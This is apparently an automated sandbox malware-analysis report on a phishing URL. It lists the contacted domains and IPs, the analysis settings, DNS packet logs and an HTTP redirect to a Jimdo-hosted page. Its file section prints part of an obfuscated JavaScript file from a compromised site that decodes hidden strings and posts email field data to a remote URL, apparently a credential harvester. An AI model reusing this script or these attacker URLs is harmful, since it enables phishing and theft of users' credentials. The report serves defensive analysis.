https://www.hotjar.com/legal/policies/privacy	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)	chromecache_182.2.dr	false		unknown
https://policy.pinterest.com/en-gb/privacy-policy	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://www.kddi-webcommunications.co.jp/privacy)	chromecache_155.2.dr	false		unknown
https://connect.facebook.net/en_US/fbevents.js	chromecache_170.2.dr	false		high
https://www.cloudflare.com/cookie-policy/	chromecache_155.2.dr, chromecache_189.2.dr, chromecache_163.2.dr, chromecache_215.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2)	chromecache_182.2.dr	false		unknown
https://presse.jimdo.com/	chromecache_201.2.dr	false		high
https://admin.typeform.com/to/dwk6gt/?typeform-source=www.typeform.com	chromecache_155.2.dr	false		high
https://developers.cloudflare.com/r2/data-access/public-buckets/	chromecache_162.2.dr	false		high
https://safety.google/privacy/privacy-controls/	chromecache_189.2.dr, chromecache_215.2.dr	false		unknown
https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#layout	chromecache_203.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)	chromecache_182.2.dr	false		unknown
https://account.e.jimdo.com/login	chromecache_128.2.dr	false		high
https://help.hotjar.com/hc/en-us/articles/115011789248-Hotjar-Cookies	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)	chromecache_182.2.dr	false		unknown
https://logo.e.jimdo.com/?lng=en	chromecache_146.2.dr, chromecache_128.2.dr	false		high
https://bandcamp.com/privacy_shield	chromecache_155.2.dr	false		high
https://www.google.com/analytics/terms)	chromecache_155.2.dr	false		high
https://www.jimdo.com/fr/	chromecache_155.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)	chromecache_182.2.dr	false		unknown
https://jimdo-storage.freetls.fastly.net/	chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	false		unknown
https://www.jimdo.com	chromecache_144.2.dr, chromecache_181.2.dr	false		high
https://www.jimdo.com/de/	chromecache_155.2.dr	false		high
http://tools.google.com/dlpage/gaoptout	chromecache_155.2.dr	false		high
https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2)	chromecache_204.2.dr	false		unknown
https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu72xKOzY.woff2)	chromecache_182.2.dr	false		unknown
https://policies.google.com/)	chromecache_155.2.dr	false		high
https://adservice.google.com/pagead/regclk	chromecache_170.2.dr	false		high
https://cct.google/taggy/agent.js	chromecache_170.2.dr	false	URL Reputation: safe	unknown
https://static.ads-twitter.com/uwt.js	chromecache_170.2.dr	false	URL Reputation: safe	unknown
https://policies.google.com/privacy?hl=ja	chromecache_155.2.dr	false		high
https://www.tumblr.com/privacy	chromecache_155.2.dr	false		high
https://www.jimdo.com/	chromecache_155.2.dr	false		high
https://www.jimdo.com/nl/addon/legal-text-generator/)	chromecache_155.2.dr	false		high
https://www.spotify.com/legal/privacy-policy/	chromecache_155.2.dr	false		high
https://www.jimdo.com/info/privacy/)	chromecache_155.2.dr	false		high
https://www.spotify.com/legal/cookies-policy/	chromecache_155.2.dr	false		high
https://www.cognigy.com/privacy-policy	chromecache_189.2.dr, chromecache_215.2.dr	false		unknown
https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)	chromecache_182.2.dr	false		unknown
https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/default-website-favicon.	chromecache_139.2.dr, chromecache_211.2.dr, chromecache_163.2.dr	false		unknown
https://www.jimdo.com/website/portfolio/	chromecache_146.2.dr, chromecache_128.2.dr	false		high
https://www.youtube.com/user/jimdo	chromecache_146.2.dr, chromecache_128.2.dr	false		high
https://help.business.jimdo.com/hc/de	chromecache_201.2.dr	false		high
https://www.datadoghq.com/legal/privacy/	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://www.jimdo.com/jp/	chromecache_155.2.dr	false		high
https://aka.ms/privacyresponse	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://www.jimdo-status.com/).	chromecache_155.2.dr	false		unknown
https://www.pinterest.de/JimdoEN/	chromecache_146.2.dr, chromecache_128.2.dr	false		high
https://stripe.com/privacy	chromecache_155.2.dr	false		high
https://www.cloudflare.com/privacypolicy/	chromecache_189.2.dr, chromecache_163.2.dr, chromecache_215.2.dr	false		high
https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2)	chromecache_204.2.dr	false		unknown
https://www.cloudflare.com/ja-jp/privacypolicy/	chromecache_155.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.215.100	google.com	United States	15169	GOOGLEUS	false
13.107.246.41	part-0013.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
54.72.164.245	feature-flags-proxy.prod.jimdo.systems	United States	16509	AMAZON-02US	false
104.18.3.35	pub-06c7664497d24b6cb36a093c4426dcca.r2.dev	United States	13335	CLOUDFLARENETUS	false
142.250.9.106	unknown	United States	15169	GOOGLEUS	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
34.149.254.14	web.cmp.usercentrics.eu	United States	2686	ATGS-MMD-ASUS	false
13.107.213.40	part-0012.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
54.217.4.226	at.prod.jimdo.systems	United States	16509	AMAZON-02US	false
52.2.56.64	znixulyp.com	United States	14618	AMAZON-AESUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
18.200.162.103	account.prod.jimdo.systems	United States	16509	AMAZON-02US	false
172.217.215.139	unknown	United States	15169	GOOGLEUS	false
34.95.108.180	uct.service.usercentrics.eu	United States	15169	GOOGLEUS	false
192.185.144.111	grupoej.com	United States	46606	UNIFIEDLAYER-AS-1US	false
142.250.105.106	unknown	United States	15169	GOOGLEUS	false
151.101.2.79	jimdo-dolphin-static-assets-prod.freetls.fastly.net	United States	54113	FASTLYUS	false
64.233.177.105	www.google.com	United States	15169	GOOGLEUS	false
35.190.14.188	app.usercentrics.eu	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
34.102.170.124	v1.api.service.cmp.usercentrics.eu	United States	15169	GOOGLEUS	false
35.201.111.240	consent-api.service.consent.usercentrics.eu	United States	15169	GOOGLEUS	false
104.17.2.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428296
Start date and time:	2024-04-18 19:38:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://znixulyp.com/vGgw6o
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.phis.win@33/172@84/24
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html Browse: https://doc-36.jimdosite.com/imprint/ Browse: https://doc-36.jimdosite.com/cookie-settings/ Browse: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webview Browse: https://doc-36.jimdosite.com/ Browse: https://doc-36.jimdosite.com/cookie-settings/ Browse: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webview Browse: https://doc-36.jimdosite.com/ Browse: https://doc-36.jimdosite.com/imprint/

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 64.233.185.94, 173.194.219.138, 173.194.219.101, 173.194.219.139, 173.194.219.102, 173.194.219.100, 173.194.219.113, 173.194.219.84, 34.104.35.123, 162.159.128.70, 162.159.129.70, 104.18.41.38, 172.64.146.218, 64.233.177.94, 40.68.123.157, 23.47.204.49, 23.47.204.52, 23.47.204.45, 23.47.204.51, 23.47.204.50, 23.47.204.64, 23.47.204.55, 23.47.204.72, 23.47.204.74, 13.85.23.206, 192.229.211.108, 151.101.130.2, 151.101.66.2, 151.101.194.2, 151.101.2.2, 104.18.35.182, 172.64.152.74, 20.166.126.56, 142.250.9.97, 74.125.138.84, 74.125.138.94, 142.250.105.94
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, update.googleapis.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, f2.shared.global.fastly.net, accounts.google.com, fonts.jimstatic.com.cdn.cloudflare.net, fonts.gstatic.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, wu-bg-shim.trafficmanager.net, firstparty-azurefd-prod.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, country.jimdo.com.cdn.cloudflare.net, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, web.jimdosite.com.cdn.cloudflare.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: https://znixulyp.com/vGgw6o

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2442
Entropy (8bit):	5.666708412552213
Encrypted:	false
SSDEEP:	48:X7b3To6fIuTrw3offpfHfOOnfu2m0fXafql0n3nnbdleXQDaAO:XvpfLP3fpfHfOOnfuT0fKfqabds7
MD5:	3A75E2B84CC82E2230E7EFB113AF4833
SHA1:	DE18AE595EE6DF58CE59F77679CEE7A69C4714FB
SHA-256:	2FA4FB041D9206C60E0E41D487F062E997DF75F4CE5EF73A23B7837FE15C77C1
SHA-512:	229026666C1476793BF432D5B8067939AE1B1F60C824527D8AE3ED97A8E04CE7799F900A81A75A4078BE2432AF32746C511A18C22750253FDB99BAB7F9AC7FEE
Malicious:	false
Reputation:	low
URL:	https://grupoej.com/awazwwazq/host%5b24.0%5d/admin/js/sc.php?r=ZW0sZW1haWwsYWRk
Preview:	var v8439e652970a4363482301f= document.createElement('script');..var autograb = 0;..v8439e652970a4363482301f.setAttribute('src',atob("aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw=="));..document.head.append(v8439e652970a4363482301f);....var v534af21c= document.createElement('script');..v534af21c.setAttribute('src',"https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(v534af21c);....v8439e652970a4363482301f.onload=function(){..$.support.cors = true..var va153a26b6874026d6746d17dcbabd = atob;..var v2d2e0983 = "".split;..var v0092b3b7e45884170c721c58a463 = [].constructor.constructor(va153a26b6874026d6746d17dcbabd("cmV0dXJuIENyeXB0b0pT"));..var vb8033d45 = va153a26b6874026d6746d17dcbabd($('#b64u').val());..$.post(vb8033d45,'scte='.concat('') + (autograb == 0 ? '&auto=false' : '') + '&f=WyJlbSIsImVtYWlsIiwiYWRkIl0=')....done(function(va0c3f328f){...function vbe6bdf2e6817c5a2(f){.....var O00O1II = v2d2e0983.apply(va153a26b6874026d6746

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 19:39:02.420845985 CEST	53	64827	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:02.420913935 CEST	53	52966	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:03.011475086 CEST	53	53958	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:03.775989056 CEST	62268	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:03.776165962 CEST	59688	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:03.970762968 CEST	53	62268	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:03.980051041 CEST	53	59688	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:04.511071920 CEST	61014	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:04.511437893 CEST	57377	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:04.620492935 CEST	53	57377	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:05.275387049 CEST	55433	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.275604010 CEST	50093	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.276194096 CEST	56992	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.276325941 CEST	64534	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.276525021 CEST	64187	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.276665926 CEST	58021	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.385257006 CEST	53	55433	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:05.387693882 CEST	53	50093	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:05.387732983 CEST	53	64534	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:05.388406038 CEST	53	56992	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:05.472364902 CEST	65146	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.472491026 CEST	56668	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:05.577925920 CEST	53	56668	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:05.579193115 CEST	53	65146	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:06.021209955 CEST	53	57207	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:07.692974091 CEST	52875	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:07.693105936 CEST	62812	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:07.799465895 CEST	53	62812	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:07.800914049 CEST	53	52875	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:07.808222055 CEST	58095	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:07.808358908 CEST	64926	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:07.915649891 CEST	53	58095	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:07.916151047 CEST	53	64926	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:08.161040068 CEST	63232	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:08.161221981 CEST	53189	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:08.270426989 CEST	53	63232	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:08.271883011 CEST	53	53189	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:10.847412109 CEST	59856	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:10.847759008 CEST	57288	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:10.956923008 CEST	53	57288	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:16.725639105 CEST	65507	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:16.725846052 CEST	64577	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:16.835302114 CEST	53	65507	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:16.835705996 CEST	53	64577	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:17.812144995 CEST	57861	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:17.812400103 CEST	59276	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:17.813402891 CEST	56099	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:17.824867010 CEST	55109	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:17.917917013 CEST	53	59276	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:17.917982101 CEST	53	57861	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:17.938719988 CEST	53	55109	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:17.954569101 CEST	53	56099	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:18.413572073 CEST	54233	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:18.414099932 CEST	63416	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:18.414937973 CEST	59978	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:18.415222883 CEST	52926	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:18.518361092 CEST	53	54233	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:18.518795967 CEST	53	63416	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:18.519180059 CEST	53	59978	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:18.520354986 CEST	53	52926	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:21.180919886 CEST	53	61459	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:21.183352947 CEST	56538	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:21.183352947 CEST	63509	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:21.321302891 CEST	53	63509	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:21.322701931 CEST	53	56538	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:23.073584080 CEST	138	138	192.168.2.4	192.168.2.255
Apr 18, 2024 19:39:28.727897882 CEST	60021	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:28.728370905 CEST	53076	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:28.836487055 CEST	53	53076	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:32.065567017 CEST	61810	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:32.065963984 CEST	54163	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:32.174787045 CEST	53	54163	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:32.653327942 CEST	61201	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:32.653489113 CEST	55441	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:32.773999929 CEST	53	61201	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:32.784009933 CEST	53	55441	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:33.079292059 CEST	53449	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:33.079705000 CEST	62406	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:33.119853973 CEST	59209	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:33.120270967 CEST	60641	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:33.188277006 CEST	53	62406	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:33.232938051 CEST	53	60641	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:35.289124012 CEST	59877	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:35.290519953 CEST	65306	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:35.413131952 CEST	53	65306	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:35.431274891 CEST	53	59877	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:36.050910950 CEST	61186	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:36.051868916 CEST	57297	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:36.052577972 CEST	52138	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:36.053042889 CEST	60157	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:36.109853983 CEST	60325	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:36.110258102 CEST	54723	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:36.155388117 CEST	53	61186	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:36.157013893 CEST	53	52138	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:36.159512997 CEST	53	60157	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:36.195868015 CEST	53	57297	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:36.215876102 CEST	53	60325	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:36.238873959 CEST	53	54723	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:37.004708052 CEST	53853	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:37.004838943 CEST	57233	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:37.105952024 CEST	53	64684	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:37.114330053 CEST	53	53853	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:37.114367008 CEST	53	57233	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:37.349900961 CEST	51193	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:37.350109100 CEST	53508	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:37.458642006 CEST	53	51193	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:37.458969116 CEST	53	53508	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:38.139766932 CEST	50420	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:38.140002966 CEST	58520	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:38.141007900 CEST	53082	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:38.141128063 CEST	54093	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:38.248567104 CEST	53	58520	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:38.248975039 CEST	53	50420	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:38.249810934 CEST	53	53082	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:38.264673948 CEST	53	54093	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:38.330075026 CEST	55968	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:38.330193043 CEST	60344	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:38.451607943 CEST	53	60344	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:38.456614971 CEST	53	55968	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:38.928369999 CEST	61301	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:38.928531885 CEST	53837	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:39.033904076 CEST	53	53837	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:39.036097050 CEST	53	61301	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:39.120142937 CEST	55030	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:39.120381117 CEST	57371	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:39.126117945 CEST	63249	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:39.126323938 CEST	63483	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:39.228576899 CEST	53	57371	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:39.234086990 CEST	53	63249	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:39.244770050 CEST	53	55030	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:39.274956942 CEST	53	63483	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:40.128885031 CEST	53	52697	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:41.430265903 CEST	58381	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:41.430427074 CEST	55885	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:41.534780025 CEST	53	58381	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:41.559238911 CEST	53	55885	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:41.679927111 CEST	53	53835	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:42.122397900 CEST	52378	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:42.122555971 CEST	63189	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:42.226732969 CEST	53	52378	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:42.227432013 CEST	53	63189	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:42.572856903 CEST	54593	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:42.573002100 CEST	52845	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:42.677495956 CEST	53	54593	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:42.677706003 CEST	53	52845	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:42.678678036 CEST	53	54418	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:43.121855021 CEST	53	58379	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:43.127942085 CEST	63604	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:43.128165007 CEST	50219	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:43.232340097 CEST	53	63604	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:43.232423067 CEST	53	50219	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:57.132051945 CEST	58453	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:57.132266998 CEST	65381	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:57.237437010 CEST	53	58453	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:57.237792969 CEST	53	58093	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:57.237875938 CEST	53	65381	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:57.675509930 CEST	50454	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:57.675729990 CEST	57993	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:39:57.780934095 CEST	53	57993	1.1.1.1	192.168.2.4
Apr 18, 2024 19:39:57.781172037 CEST	53	50454	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:01.640921116 CEST	53	55339	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:02.452670097 CEST	53	62343	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:10.726588964 CEST	59132	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:40:10.726588964 CEST	60511	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:40:10.834510088 CEST	53	60511	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:10.834604979 CEST	53	59132	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:11.263189077 CEST	52628	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:40:11.263454914 CEST	63439	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:40:11.370563984 CEST	53	52628	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:11.370609045 CEST	53	63439	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:11.383349895 CEST	53	53843	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:11.631650925 CEST	58822	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:40:11.631947041 CEST	49617	53	192.168.2.4	1.1.1.1
Apr 18, 2024 19:40:11.741426945 CEST	53	49617	1.1.1.1	192.168.2.4
Apr 18, 2024 19:40:11.756776094 CEST	53	58822	1.1.1.1	192.168.2.4

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 18, 2024 19:39:36.195971966 CEST	192.168.2.4	1.1.1.1	c24a	(Port unreachable)	Destination Unreachable
Apr 18, 2024 19:39:39.275023937 CEST	192.168.2.4	1.1.1.1	c251	(Port unreachable)	Destination Unreachable
Apr 18, 2024 19:39:41.559303045 CEST	192.168.2.4	1.1.1.1	c1f1	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:04 UTC	661	OUT	GET /vGgw6o HTTP/1.1 Host: znixulyp.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:04 UTC	138	IN	HTTP/1.1 302 Found Location: https://doc-36.jimdosite.com/ Date: Thu, 18 Apr 2024 17:39:04 GMT Content-Length: 0 Connection: close

Timestamp	Bytes transferred	Direction	Data
